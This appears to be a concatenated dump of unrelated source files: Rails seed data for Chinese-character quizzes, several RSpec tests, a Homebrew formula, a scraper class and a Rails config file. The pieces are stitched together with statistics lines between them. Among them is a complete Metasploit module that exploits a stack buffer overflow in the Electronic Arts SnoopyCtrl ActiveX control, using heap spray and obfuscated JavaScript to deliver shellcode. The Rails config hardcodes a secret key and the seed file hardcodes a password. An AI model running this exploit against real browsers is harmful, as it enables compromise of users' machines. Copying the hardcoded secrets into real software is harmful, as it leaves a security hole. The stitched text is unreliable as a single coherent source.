pinyin: "gāng",
simplified: "纲",
definition: "def",
created_at: "2018-10-28T13:22:22.765Z",
updated_at: "2018-10-28T13:22:22.765Z"
},
{
id: 90,
pinyin: "fá",
simplified: "罚",
definition: "def",
created_at: "2018-10-28T13:22:30.623Z",
updated_at: "2018-10-28T13:22:30.623Z"
},
{
id: 91,
pinyin: "zhēng",
simplified: "争",
definition: "def",
created_at: "2018-10-28T13:22:45.869Z",
updated_at: "2018-10-28T13:22:45.869Z"
},
{
id: 92,
pinyin: "shé",
simplified: "蛇",
definition: "def",
created_at: "2018-10-28T13:22:58.212Z",
updated_at: "2018-10-28T13:22:58.212Z"
},
{
id: 93,
pinyin: "là",
simplified: "蜡",
definition: "def",
created_at: "2018-10-28T13:23:04.123Z",
updated_at: "2018-10-28T13:23:04.123Z"
},
{
id: 94,
pinyin: "ni",
simplified: 'null',
definition: "def",
created_at: "2018-10-28T13:40:12.820Z",
updated_at: "2018-10-28T13:40:12.820Z"
},
{
id: 95,
pinyin: "shǐ",
simplified: "使",
definition: "def",
created_at: "2018-10-28T13:46:18.544Z",
updated_at: "2018-10-28T13:46:18.544Z"
},
{
id: 96,
pinyin: "gē",
simplified: "歌",
definition: "def",
created_at: "2018-10-28T13:46:29.120Z",
updated_at: "2018-10-28T13:46:29.120Z"
},
{
id: 97,
pinyin: "suǒ",
simplified: "索",
definition: "def",
created_at: "2018-10-28T13:46:33.252Z",
updated_at: "2018-10-28T13:46:33.252Z"
},
{
id: 98,
pinyin: "gòng",
simplified: "共",
definition: "def",
created_at: "2018-10-28T13:46:39.014Z",
updated_at: "2018-10-28T13:46:39.014Z"
},
{
id: 99,
pinyin: "gē",
simplified: "哥",
definition: "def",
created_at: "2018-10-28T13:48:49.592Z",
updated_at: "2018-10-28T13:48:49.592Z"
},
{
id: 100,
pinyin: "fá",
simplified: "伐",
definition: "def",
created_at: "2018-10-28T13:48:58.369Z",
updated_at: "2018-10-28T13:48:58.369Z"
},
{
id: 101,
pinyin: "lòu",
simplified: "陋",
definition: "def",
created_at: "2018-10-28T13:49:01.220Z",
updated_at: "2018-10-28T13:49:01.220Z"
},
{
id: 102,
pinyin: "qì",
simplified: "器",
definition: "def",
created_at: "2018-10-28T13:49:05.744Z",
updated_at: "2018-10-28T13:49:05.744Z"
},
{
id: 103,
pinyin: "chéng",
simplified: "乘",
definition: "def",
created_at: "2018-10-28T13:49:09.021Z",
updated_at: "2018-10-28T13:49:09.021Z"
},
{
id: 104,
pinyin: "fán",
simplified: "凡",
definition: "def",
created_at: "2018-10-28T13:49:15.549Z",
updated_at: "2018-10-28T13:49:15.549Z"
},
{
id: 105,
pinyin: "jiǎo",
simplified: "脚",
definition: "def",
created_at: "2018-10-28T13:49:20.828Z",
updated_at: "2018-10-28T13:49:20.828Z"
},
{
id: 106,
pinyin: "fù",
simplified: "富",
definition: "def",
created_at: "2018-10-28T13:49:30.548Z",
updated_at: "2018-10-28T13:49:30.548Z"
},
{
id: 107,
pinyin: "zāo",
simplified: "糟",
definition: "def",
created_at: "2018-10-28T13:49:33.451Z",
updated_at: "2018-10-28T13:49:33.451Z"
},
{
id: 108,
pinyin: "xīn",
simplified: "新",
definition: "def",
created_at: "2018-10-28T13:49:41.902Z",
updated_at: "2018-10-28T13:49:41.902Z"
},
{
id: 109,
pinyin: "rě",
simplified: "惹",
definition: "def",
created_at: "2018-10-28T13:49:49.284Z",
updated_at: "2018-10-28T13:49:49.284Z"
},
{
id: 110,
pinyin: "zhēn",
simplified: "针",
definition: "def",
created_at: "2018-10-28T13:59:03.409Z",
updated_at: "2018-10-28T13:59:03.409Z"
},
{
id: 111,
pinyin: "qū",
simplified: "曲",
definition: "def",
created_at: "2018-10-28T13:59:09.884Z",
updated_at: "2018-10-28T13:59:09.884Z"
},
{
id: 112,
pinyin: "zěn",
simplified: "怎",
definition: "def",
created_at: "2018-10-28T13:59:22.227Z",
updated_at: "2018-10-28T13:59:22.227Z"
},
{
id: 113,
pinyin: "mā",
simplified: "妈",
definition: "def",
created_at: "2018-10-28T13:59:25.611Z",
updated_at: "2018-10-28T13:59:25.611Z"
},
{
id: 114,
pinyin: "qiǎng",
simplified: "抢",
definition: "def",
created_at: "2018-10-28T13:59:33.316Z",
updated_at: "2018-10-28T13:59:33.316Z"
},
{
id: 115,
pinyin: "qiāng",
simplified: "枪",
definition: "def",
created_at: "2018-10-28T13:59:42.993Z",
updated_at: "2018-10-28T13:59:42.993Z"
},
{
id: 116,
pinyin: "xiào",
simplified: "校",
definition: "def",
created_at: "2018-10-28T13:59:56.428Z",
updated_at: "2018-10-28T13:59:56.428Z"
},
{
id: 117,
pinyin: "péi",
simplified: "陪",
definition: "def",
created_at: "2018-10-28T14:00:08.122Z",
updated_at: "2018-10-28T14:00:08.122Z"
},
{
id: 118,
pinyin: "fèng",
simplified: "凤",
definition: "def",
created_at: "2018-10-28T14:00:11.339Z",
updated_at: "2018-10-28T14:00:11.339Z"
},
{
id: 119,
pinyin: "ā",
simplified: "啊",
definition: "def",
created_at: "2018-10-28T14:05:40.283Z",
updated_at: "2018-10-28T14:05:40.283Z"
},
{
id: 120,
pinyin: "fēng",
simplified: "疯",
definition: "def",
created_at: "2018-10-28T14:07:54.939Z",
updated_at: "2018-10-28T14:07:54.939Z"
},
{
id: 121,
pinyin: "tiāo",
simplified: "挑",
definition: "def",
created_at: "2018-10-28T14:07:59.037Z",
updated_at: "2018-10-28T14:07:59.037Z"
},
{
id: 122,
pinyin: "shèng",
simplified: "胜",
definition: "def",
created_at: "2018-10-28T14:08:04.890Z",
updated_at: "2018-10-28T14:08:04.890Z"
},
{
id: 123,
pinyin: "fān",
simplified: "翻",
definition: "def",
created_at: "2018-10-28T14:08:10.372Z",
updated_at: "2018-10-28T14:08:10.372Z"
},
{
id: 124,
pinyin: "lí",
simplified: "离",
definition: "def",
created_at: "2018-10-28T14:08:14.080Z",
updated_at: "2018-10-28T14:08:14.080Z"
},
{
id: 125,
pinyin: "zòu",
simplified: "奏",
definition: "def",
created_at: "2018-10-28T14:08:17.072Z",
updated_at: "2018-10-28T14:08:17.072Z"
},
{
id: 126,
pinyin: "hé",
simplified: "盒",
definition: "def",
created_at: "2018-10-28T14:08:20.640Z",
updated_at: "2018-10-28T14:08:20.640Z"
},
{
id: 127,
pinyin: "tuǒ",
simplified: "妥",
definition: "def",
created_at: "2018-10-28T14:08:27.254Z",
updated_at: "2018-10-28T14:08:27.254Z"
},
{
id: 128,
pinyin: "qīng",
simplified: "轻",
definition: "def",
created_at: "2018-10-28T14:08:32.788Z",
updated_at: "2018-10-28T14:08:32.788Z"
},
{
id: 129,
pinyin: "ǎn",
simplified: "俺",
definition: "def",
created_at: "2018-10-28T14:08:36.183Z",
updated_at: "2018-10-28T14:08:36.183Z"
},
{
id: 130,
pinyin: "fāng",
simplified: "芳",
definition: "def",
created_at: "2018-10-28T14:08:59.609Z",
updated_at: "2018-10-28T14:08:59.609Z"
},
{
id: 131,
pinyin: "ē",
simplified: "阿",
definition: "def",
created_at: "2018-10-30T02:19:52.348Z",
updated_at: "2018-10-30T02:19:52.348Z"
},
{
id: 132,
pinyin: "斯ē,sī",
simplified: "阿",
definition: "def",
created_at: "2018-10-30T02:28:12.564Z",
updated_at: "2018-10-30T02:28:12.564Z"
},
{
id: 133,
pinyin: "kě",
simplified: "可",
definition: "def",
created_at: "2018-10-30T03:15:01.913Z",
updated_at: "2018-10-30T03:15:01.913Z"
},
{
id: 134,
pinyin: "hái",
simplified: "还",
definition: "def",
created_at: "2018-10-30T03:45:10.836Z",
updated_at: "2018-10-30T03:45:10.836Z"
},
{
id: 135,
pinyin: "倪",
simplified: "倪",
definition: "def",
created_at: "2018-10-30T03:52:47.527Z",
updated_at: "2018-10-30T03:52:47.527Z"
},
{
id: 136,
pinyin: "ní",
simplified: "泥",
definition: "def",
created_at: "2018-10-30T03:52:48.373Z",
updated_at: "2018-10-30T03:52:48.373Z"
},
{
id: 137,
pinyin: "hē",
simplified: "喝",
definition: "def",
created_at: "2018-11-05T23:32:41.014Z",
updated_at: "2018-11-05T23:32:41.014Z"
},
{
id: 138,
pinyin: "hé",
simplified: "合",
definition: "def",
created_at: "2018-11-05T23:32:41.368Z",
updated_at: "2018-11-05T23:32:41.368Z"
},
{
id: 139,
pinyin: "hé",
simplified: "河",
definition: "def",
created_at: "2018-11-05T23:32:41.764Z",
updated_at: "2018-11-05T23:32:41.764Z"
},
{
id: 140,
pinyin: "hé",
simplified: "核",
definition: "def",
created_at: "2018-11-05T23:32:42.452Z",
updated_at: "2018-11-05T23:32:42.452Z"
},
{
id: 141,
pinyin: "hè",
simplified: "贺",
definition: "def",
created_at: "2018-11-05T23:32:42.840Z",
updated_at: "2018-11-05T23:32:42.840Z"
},
{
id: 142,
pinyin: "nà",
simplified: "那",
definition: "def",
created_at: "2018-11-14T01:20:52.963Z",
updated_at: "2018-11-14T01:20:52.963Z"
},
{
id: 143,
pinyin: " nà, ",
simplified: "那",
definition: "def",
created_at: "2018-11-14T01:22:39.325Z",
updated_at: "2018-11-14T01:22:39.325Z"
},
{
id: 144,
pinyin: "ná",
simplified: "拿",
definition: "def",
created_at: "2018-11-14T01:22:39.945Z",
updated_at: "2018-11-14T01:22:39.945Z"
},
{
id: 145,
pinyin: "nǎ",
simplified: "哪",
definition: "def",
created_at: "2018-11-14T01:22:40.381Z",
updated_at: "2018-11-14T01:22:40.381Z"
},
{
id: 146,
pinyin: "nà",
simplified: "纳",
definition: "def",
created_at: "2018-11-14T01:22:40.883Z",
updated_at: "2018-11-14T01:22:40.883Z"
},
{
id: 147,
pinyin: "nà",
simplified: "呐",
definition: "def",
created_at: "2018-11-14T01:22:41.536Z",
updated_at: "2018-11-14T01:22:41.536Z"
},
{
id: 148,
pinyin: "nà",
simplified: "钠",
definition: "def",
created_at: "2018-11-14T01:22:42.099Z",
updated_at: "2018-11-14T01:22:42.099Z"
},
{
id: 149,
pinyin: "shì",
simplified: "是",
definition: "def",
created_at: "2018-11-14T01:29:23.611Z",
updated_at: "2018-11-14T01:29:23.611Z"
},
{
id: 150,
pinyin: "shì",
simplified: "市",
definition: "def",
created_at: "2018-11-14T01:29:25.155Z",
updated_at: "2018-11-14T01:29:25.155Z"
},
{
id: 151,
pinyin: "yóu",
simplified: "由",
definition: "def",
created_at: "2018-11-14T01:29:30.123Z",
updated_at: "2018-11-14T01:29:30.123Z"
},
{
id: 152,
pinyin: "yóu",
simplified: "油",
definition: "def",
created_at: "2018-11-14T01:29:30.553Z",
updated_at: "2018-11-14T01:29:30.553Z"
},
{
id: 153,
pinyin: "shì",
simplified: "事",
definition: "def",
created_at: "2018-11-14T02:10:57.936Z",
updated_at: "2018-11-14T02:10:57.936Z"
},
{
id: 154,
pinyin: "shì",
simplified: "式",
definition: "def",
created_at: "2018-11-14T02:11:04.946Z",
updated_at: "2018-11-14T02:11:04.946Z"
},
{
id: 155,
pinyin: "shí",
simplified: "石",
definition: "def",
created_at: "2018-11-14T02:11:05.426Z",
updated_at: "2018-11-14T02:11:05.426Z"
},
{
id: 156,
pinyin: "FAF",
simplified: "A",
definition: "def",
created_at: "2018-11-24T07:04:23.283Z",
updated_at: "2018-11-24T07:04:23.283Z"
},
{
id: 157,
pinyin: "nián",
simplified: "年",
definition: "def",
created_at: "2018-12-04T14:43:13.133Z",
updated_at: "2018-12-04T14:43:13.133Z"
},
{
id: 158,
pinyin: "nèi",
simplified: "内",
definition: "def",
created_at: "2018-12-04T14:43:15.441Z",
updated_at: "2018-12-04T14:43:15.441Z"
},
{
id: 159,
pinyin: "nín",
simplified: "您",
definition: "def",
created_at: "2018-12-04T14:43:15.997Z",
updated_at: "2018-12-04T14:43:15.997Z"
},
{
id: 160,
pinyin: "hǎo",
simplified: "好",
definition: "def",
created_at: "2018-12-04T14:43:21.844Z",
updated_at: "2018-12-04T14:43:21.844Z"
},
{
id: 161,
pinyin: "hào",
simplified: "号",
definition: "def",
created_at: "2018-12-04T14:43:22.401Z",
updated_at: "2018-12-04T14:43:22.401Z"
},
{
id: 162,
pinyin: "hào",
simplified: "耗",
definition: "def",
created_at: "2018-12-04T14:43:22.828Z",
updated_at: "2018-12-04T14:43:22.828Z"
},
{
id: 163,
pinyin: "nì",
simplified: "腻",
definition: "def",
created_at: "2018-12-04T14:47:37.488Z",
updated_at: "2018-12-04T14:47:37.488Z"
},
{
id: 164,
pinyin: "hú",
simplified: "胡",
definition: "def",
created_at: "2018-12-04T15:00:06.926Z",
updated_at: "2018-12-04T15:00:06.926Z"
},
{
id: 165,
pinyin: "hǔ",
simplified: "虎",
definition: "def",
created_at: "2018-12-04T15:00:07.317Z",
updated_at: "2018-12-04T15:00:07.317Z"
},
{
id: 166,
pinyin: "hù",
simplified: "户",
definition: "def",
created_at: "2018-12-04T15:00:08.075Z",
updated_at: "2018-12-04T15:00:08.075Z"
},
{
id: 167,
pinyin: "hú",
simplified: "湖",
definition: "def",
created_at: "2018-12-04T15:00:08.452Z",
updated_at: "2018-12-04T15:00:08.452Z"
},
{
id: 168,
pinyin: "hū",
simplified: "乎",
definition: "def",
created_at: "2018-12-04T15:00:08.832Z",
updated_at: "2018-12-04T15:00:08.832Z"
},
{
id: 169,
pinyin: "hū",
simplified: "呼",
definition: "def",
created_at: "2018-12-04T15:00:09.255Z",
updated_at: "2018-12-04T15:00:09.255Z"
},
{
id: 170,
pinyin: "hù",
simplified: "互",
definition: "def",
created_at: "2018-12-04T15:00:09.673Z",
updated_at: "2018-12-04T15:00:09.673Z"
},
{
id: 171,
pinyin: "hù",
simplified: "护",
definition: "def",
created_at: "2018-12-04T15:00:10.541Z",
updated_at: "2018-12-04T15:00:10.541Z"
},
{
id: 172,
pinyin: "ér",
simplified: "而",
definition: "def",
created_at: "2018-12-04T15:03:44.757Z",
updated_at: "2018-12-04T15:03:44.757Z"
},
{
id: 173,
pinyin: "èr",
simplified: "二",
definition: "def",
created_at: "2018-12-04T15:03:45.120Z",
updated_at: "2018-12-04T15:03:45.120Z"
},
{
id: 174,
pinyin: "ér",
simplified: "儿",
definition: "def",
created_at: "2018-12-04T15:03:45.556Z",
updated_at: "2018-12-04T15:03:45.556Z"
},
{
id: 175,
pinyin: "ěr",
simplified: "尔",
definition: "def",
created_at: "2018-12-04T15:03:45.963Z",
updated_at: "2018-12-04T15:03:45.963Z"
},
{
id: 176,
pinyin: "ěr",
simplified: "耳",
definition: "def",
created_at: "2018-12-04T15:03:46.415Z",
updated_at: "2018-12-04T15:03:46.415Z"
},
{
id: 177,
pinyin: "èr",
simplified: "贰",
definition: "def",
created_at: "2018-12-04T15:03:46.850Z",
updated_at: "2018-12-04T15:03:46.850Z"
},
{
id: 178,
pinyin: "ěr",
simplified: "饵",
definition: "def",
created_at: "2018-12-04T15:03:47.279Z",
updated_at: "2018-12-04T15:03:47.279Z"
}
]
quizzes = [
{
user_id:1,
title:'midterm 301a review'
},
{
user_id:1,
title:'Amy Review'
},
{
user_id:1,
title:'Jacob Review'
},
{
user_id:1,
title:'405A Final'
},
{
user_id:1,
title:'weekly quiz'
},
{
user_id:1,
title:'random test'
},
{
user_id:1,
title:'midterm 301b review'
}
]
quiz_chars = [
{
},
]
User.create(username:'gardiner',password:'xiezi')
characters.each do |char|
Character.create(pinyin:char[:pinyin],simplified:char[:simplified],definition:char[:definition])
end
quizzes.each do |quiz|
Quiz.create(user_id:quiz[:user_id],title:quiz[:title])
end
Character.all.each_with_index do |char,index|
QuizChar.create(quiz_id:index%7+1,character_id:index)
end
| 18 | 111 | 0.662031 |
b9bc4409aa0854a4342e5b51385e33067855fee0 | 457 | module Xxx
class Youporn
HOST = "youporn.com"
URI = "http://#{HOST}"
BROWSE_TIME_PATH = "/browse/time"
ENTER_WEBSITE = lambda { |page| page.forms.first.click_button }
def agent
@agent ||= Mechanize.new
end
def latest
agent.get(uri(BROWSE_TIME_PATH), &ENTER_WEBSITE)
path = agent.page.links_with(:href => /watch/).first.href
uri(path)
end
def uri(path)
"#{URI}#{path}"
end
end
end
| 19.869565 | 67 | 0.601751 |
ff1c48fd7c3425b6df241a178aa2daf181a78823 | 659 | # Be sure to restart your server when you modify this file.
# Your secret key is used for verifying the integrity of signed cookies.
# If you change this key, all old signed cookies will become invalid!
# Make sure the secret is at least 30 characters and all random,
# no regular words or you'll be exposed to dictionary attacks.
# You can use `rake secret` to generate a secure secret key.
# Make sure your secret_key_base is kept private
# if you're sharing your code publicly.
Dummy::Application.config.secret_key_base = '4f77edbdf832c10f002e96519db1ffa049c259538a985d737607d6640f1d62fb168f95c9ee50ab1ac9df5041f02ef8f469742303a5ea809af876210817762e9d'
| 50.692308 | 174 | 0.814871 |
1d495f9ed747e859bf1cbf5a1eb7afbdd4b3d095 | 1,439 | # require 'rails_helper'
# describe "On the login page" do
# describe "a user that is not logged in" do
# it "should be able to sign up or log in as a student or teacher" do
# visit '/'
# expect(page).to have_link('', href:"/auth/teacher_login")
# expect(page).to have_link('', href:"/auth/teacher_signup")
# expect(page).to have_link('', href:"/auth/student_login")
# expect(page).to have_link('', href:"/auth/student_signup")
# end
# end
# describe "a user who is logged in as a teacher" do
# before do
# teacher = Teacher.create(first_name: 'test', last_name: 'test',
# email: '[email protected]', password: 'test')
# page.set_rack_session(:user_id => teacher.id)
# page.set_rack_session(:user_type => 'teacher')
# end
# it "should be redirected to the ember app" do
# visit '/'
# expect(page).to have_css('div#ember-app')
# end
# end
# describe "a user who is logged in as a student" do
# before do
# student = Student.create(first_name: 'test', last_name: 'test',
# username: 'test', password: 'test')
# page.set_rack_session(:user_id => student.id)
# page.set_rack_session(:user_type => 'student')
# end
# it "should be redirected to the ember app" do
# visit '/'
# expect(page).to have_css('div#ember-app')
# end
# end
# end
| 32.704545 | 74 | 0.591383 |
bf1423ffe50fc177b72f73a650311fd3269aa74d | 1,870 | require "rails_helper"
RSpec.describe "Session API", type: :request do
describe "GET /auth/logged_in" do
context "when user is not logged in" do
before { get "/api/v1/auth/logged_in" }
it "returns logged_in false" do
expect(json["payload"]["logged_in"]).to eq(false)
end
it "returns status code 200" do
expect(response).to have_http_status(200)
end
end
end
describe "GET /auth/logout" do
context "logout user" do
before { delete "/api/v1/auth/logout" }
it "returns logged_in false" do
expect(json["logged_in"]).to eq(false)
end
it "returns status code 200" do
expect(response).to have_http_status(200)
end
end
end
describe "POST /auth/login" do
new_user_details = {
email: "[email protected]",
password: "testpassword"
}
let!(:new_user) do
create :user,
email: new_user_details[:email],
password: new_user_details[:password]
end
let(:valid_credentials) do
{
email: new_user_details[:email],
password: new_user_details[:password]
}
end
context "login credentials are valid" do
before { post "/api/v1/auth/login", params: valid_credentials }
it "returns user details" do
expect(json["payload"]["email"]).to eq(new_user[:email])
end
it "returns 200 status" do
expect(response).to have_http_status(200)
end
after { get "/api/v1/auth/logged_in" }
end
context "login credentials are invalid" do
before { post "/api/v1/auth/login", params: {} }
it "returns invalid request" do
expect(json["errors"]["global"]).to eq("Incorrect Email or Password")
end
it "returns 400 status" do
expect(response).to have_http_status(400)
end
end
end
end
| 25.27027 | 77 | 0.613904 |
ff0d80e6abdbf82e135b51822a40cf3078374fcc | 121 | json.array! @suggested_alternatives, partial: "suggested_alternatives/suggested_alternative", as: :suggested_alternative
| 60.5 | 120 | 0.859504 |
abe95f5c44d432d67a04f910c8ec0e63ea2c8f87 | 1,316 | # frozen_string_literal: true
class SnippetBlobPresenter < BlobPresenter
include GitlabRoutingHelper
def rich_data
return unless blob.rich_viewer
render_rich_partial
end
def plain_data
return if blob.binary?
highlight(plain: false)
end
def raw_path
snippet_blob_raw_route(only_path: true)
end
def raw_url
snippet_blob_raw_route
end
private
def snippet_multiple_files?
blob.container.repository_exists? && Feature.enabled?(:snippet_multiple_files, current_user)
end
def snippet
blob.container
end
def language
nil
end
def render_rich_partial
renderer.render("projects/blob/viewers/_#{blob.rich_viewer.partial_name}",
locals: { viewer: blob.rich_viewer, blob: blob, blob_raw_path: raw_path, blob_raw_url: raw_url },
layout: false)
end
def renderer
proxy = Warden::Proxy.new({}, Warden::Manager.new({})).tap do |proxy_instance|
proxy_instance.set_user(current_user, scope: :user)
end
ApplicationController.renderer.new('warden' => proxy)
end
def snippet_blob_raw_route(only_path: false)
return gitlab_raw_snippet_blob_url(snippet, blob.path, only_path: only_path) if snippet_multiple_files?
gitlab_raw_snippet_url(snippet, only_path: only_path)
end
end
| 21.933333 | 117 | 0.724924 |
ab0a23727bc89b82e973f3aa351d805c88ebd44d | 831 | class Ddate < Formula
desc "Converts boring normal dates to fun Discordian Date"
homepage "https://github.com/bo0ts/ddate"
url "https://github.com/bo0ts/ddate/archive/v0.2.2.tar.gz"
sha256 "d53c3f0af845045f39d6d633d295fd4efbe2a792fd0d04d25d44725d11c678ad"
bottle do
cellar :any
sha256 "8b7017ecb63545d996e06008df12e7cbd3b9da90545d2accb5ebf28c6af4f088" => :mavericks
sha256 "91f1bb80f8fdf4fd994fba1cddafc94a17b2daa0f8a5483735a8dc38c9eda5f1" => :mountain_lion
sha256 "12b52e2c5881c51aa902c10b236dc6c2e42e9d4b7e666f19b86a86bf211e398a" => :lion
end
def install
system ENV.cc, "ddate.c", "-o", "ddate"
bin.install "ddate"
man1.install "ddate.1"
end
test do
output = shell_output("#{bin}/ddate 20 6 2014").strip
assert_equal "Sweetmorn, Confusion 25, 3180 YOLD", output
end
end
| 33.24 | 95 | 0.758123 |
877bf8e43af83d7164aff87751d345b2ac954ba7 | 2,367 | require 'spec_helper'
RSpec.describe 'Coinfield integration specs' do
let(:client) { Cryptoexchange::Client.new }
let(:btc_cad_pair) { Cryptoexchange::Models::MarketPair.new(base: 'BTC', target: 'CAD', market: 'coinfield') }
it 'fetch pairs' do
pairs = client.pairs('coinfield')
expect(pairs).not_to be_empty
pair = pairs.first
expect(pair.base).to_not be nil
expect(pair.target).to_not be nil
expect(pair.market).to eq 'coinfield'
end
it 'give trade url' do
trade_page_url = client.trade_page_url 'coinfield', base: btc_cad_pair.base, target: btc_cad_pair.target
expect(trade_page_url).to eq "https://trade.coinfield.com/pro/trade/BTC-CAD"
end
it 'fetch ticker' do
ticker = client.ticker(btc_cad_pair)
expect(ticker.base).to eq btc_cad_pair.base
expect(ticker.target).to eq btc_cad_pair.target
expect(ticker.market).to eq btc_cad_pair.market
expect(ticker.ask).to be_a Numeric
expect(ticker.bid).to be_a Numeric
expect(ticker.high).to be_a Numeric
expect(ticker.low).to be_a Numeric
expect(ticker.last).to be_a Numeric
expect(ticker.volume).to be_a Numeric
expect(ticker.timestamp).to be_a Numeric
expect(2000..Date.today.year).to include(Time.at(ticker.timestamp).year)
expect(ticker.payload).to_not be nil
end
it 'fetch order book' do
order_book = client.order_book(btc_cad_pair)
expect(order_book.base).to eq 'BTC'
expect(order_book.target).to eq 'CAD'
expect(order_book.market).to eq 'coinfield'
expect(order_book.asks).to_not be_empty
expect(order_book.bids).to_not be_empty
expect(order_book.asks.first.price).to_not be_nil
expect(order_book.bids.first.amount).to_not be_nil
expect(order_book.bids.first.timestamp).to be_nil
expect(order_book.timestamp).to be_a Numeric
expect(order_book.payload).to_not be nil
end
it 'fetch trade' do
trades = client.trades(btc_cad_pair)
trade = trades.sample
expect(trades).to_not be_empty
expect(trade.trade_id).to_not be_nil
expect(trade.base).to eq 'BTC'
expect(trade.target).to eq 'CAD'
expect(trade.type).to be_nil
expect(trade.price).to be_a Numeric
expect(trade.amount).to be_a Numeric
expect(trade.timestamp).to be_a Numeric
expect(trade.payload).to_not be nil
expect(trade.market).to eq 'coinfield'
end
end
| 34.304348 | 112 | 0.724968 |
d5688a3fb75861d657c970553a203c4a91027fb2 | 2,760 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Electronic Arts SnoopyCtrl
ActiveX Control (NPSnpy.dll 1.1.0.36. When sending a overly long
string to the CheckRequirements() method, an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'References' =>
[
[ 'CVE', '2007-4466' ],
[ 'OSVDB', '37723'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]
],
'DisclosureDate' => 'Oct 8 2007',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, "or al, 12").encode_string * 2)
js = %Q|
try {
var evil_string = "";
var index;
var vulnerable = new ActiveXObject('SnoopyX.SnoopyCtrl.1');
var my_unescape = unescape;
var shellcode = '#{shellcode}';
#{js_heap_spray}
sprayHeap(my_unescape(shellcode), 0x0c0c0c0c, 0x40000);
for (index = 0; index < 5000; index++) {
evil_string = evil_string + my_unescape('#{ret}');
}
vulnerable.CheckRequirements(evil_string);
} catch( e ) { window.location = 'about:blank' ; }
|
opts = {
'Strings' => true,
'Symbols' => {
'Variables' => [
'vulnerable',
'shellcode',
'my_unescape',
'index',
'evil_string',
]
}
}
js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
js.update_opts(js_heap_spray.opts)
js.obfuscate()
content = %Q|<html>
<body>
<script><!--
#{js}
//</script>
</body>
</html>
|
print_status("Sending #{self.name}")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end
| 23.793103 | 105 | 0.613768 |
6a9df0e5099f178a01249027128709606c99697f | 2,246 | # frozen_string_literal: true
require 'spec_helper'
describe Bitbucket::Representation::PullRequest do
describe '#iid' do
it { expect(described_class.new('id' => 1).iid).to eq(1) }
end
describe '#author' do
it { expect(described_class.new({ 'author' => { 'nickname' => 'Ben' } }).author).to eq('Ben') }
it { expect(described_class.new({}).author).to be_nil }
end
describe '#description' do
it { expect(described_class.new({ 'description' => 'Text' }).description).to eq('Text') }
it { expect(described_class.new({}).description).to be_nil }
end
describe '#state' do
it { expect(described_class.new({ 'state' => 'MERGED' }).state).to eq('merged') }
it { expect(described_class.new({ 'state' => 'DECLINED' }).state).to eq('closed') }
it { expect(described_class.new({ 'state' => 'SUPERSEDED' }).state).to eq('closed') }
it { expect(described_class.new({}).state).to eq('opened') }
end
describe '#title' do
it { expect(described_class.new('title' => 'Issue').title).to eq('Issue') }
end
describe '#source_branch_name' do
it { expect(described_class.new({ source: { branch: { name: 'feature' } } }.with_indifferent_access).source_branch_name).to eq('feature') }
it { expect(described_class.new({ source: {} }.with_indifferent_access).source_branch_name).to be_nil }
end
describe '#source_branch_sha' do
it { expect(described_class.new({ source: { commit: { hash: 'abcd123' } } }.with_indifferent_access).source_branch_sha).to eq('abcd123') }
it { expect(described_class.new({ source: {} }.with_indifferent_access).source_branch_sha).to be_nil }
end
describe '#target_branch_name' do
it { expect(described_class.new({ destination: { branch: { name: 'master' } } }.with_indifferent_access).target_branch_name).to eq('master') }
it { expect(described_class.new({ destination: {} }.with_indifferent_access).target_branch_name).to be_nil }
end
describe '#target_branch_sha' do
it { expect(described_class.new({ destination: { commit: { hash: 'abcd123' } } }.with_indifferent_access).target_branch_sha).to eq('abcd123') }
it { expect(described_class.new({ destination: {} }.with_indifferent_access).target_branch_sha).to be_nil }
end
end
| 44.039216 | 147 | 0.685663 |
ff9ee2907c6312aac30e15438272aa5235fdb093 | 1,524 | # -*- encoding: utf-8 -*-
# stub: jekyll-sass-converter 1.5.2 ruby lib
Gem::Specification.new do |s|
s.name = "jekyll-sass-converter".freeze
s.version = "1.5.2"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["Parker Moore".freeze]
s.date = "2018-02-03"
s.email = ["[email protected]".freeze]
s.homepage = "https://github.com/jekyll/jekyll-sass-converter".freeze
s.licenses = ["MIT".freeze]
s.rubygems_version = "3.2.3".freeze
s.summary = "A basic Sass converter for Jekyll.".freeze
s.installed_by_version = "3.2.3" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_runtime_dependency(%q<sass>.freeze, ["~> 3.4"])
s.add_development_dependency(%q<bundler>.freeze, ["~> 1.5"])
s.add_development_dependency(%q<jekyll>.freeze, [">= 2.0"])
s.add_development_dependency(%q<rake>.freeze, [">= 0"])
s.add_development_dependency(%q<rspec>.freeze, [">= 0"])
s.add_development_dependency(%q<rubocop>.freeze, ["= 0.51"])
else
s.add_dependency(%q<sass>.freeze, ["~> 3.4"])
s.add_dependency(%q<bundler>.freeze, ["~> 1.5"])
s.add_dependency(%q<jekyll>.freeze, [">= 2.0"])
s.add_dependency(%q<rake>.freeze, [">= 0"])
s.add_dependency(%q<rspec>.freeze, [">= 0"])
s.add_dependency(%q<rubocop>.freeze, ["= 0.51"])
end
end
| 38.1 | 112 | 0.667323 |
877f0787e1a21d506921e2f8bda91f2b8813298f | 228 | class AddAnnouncementManagerCourseRelationships < ActiveRecord::Migration[6.1]
def change
add_reference :courses, :announcement_manager, index: true
add_reference :announcement_managers, :course, index: true
end
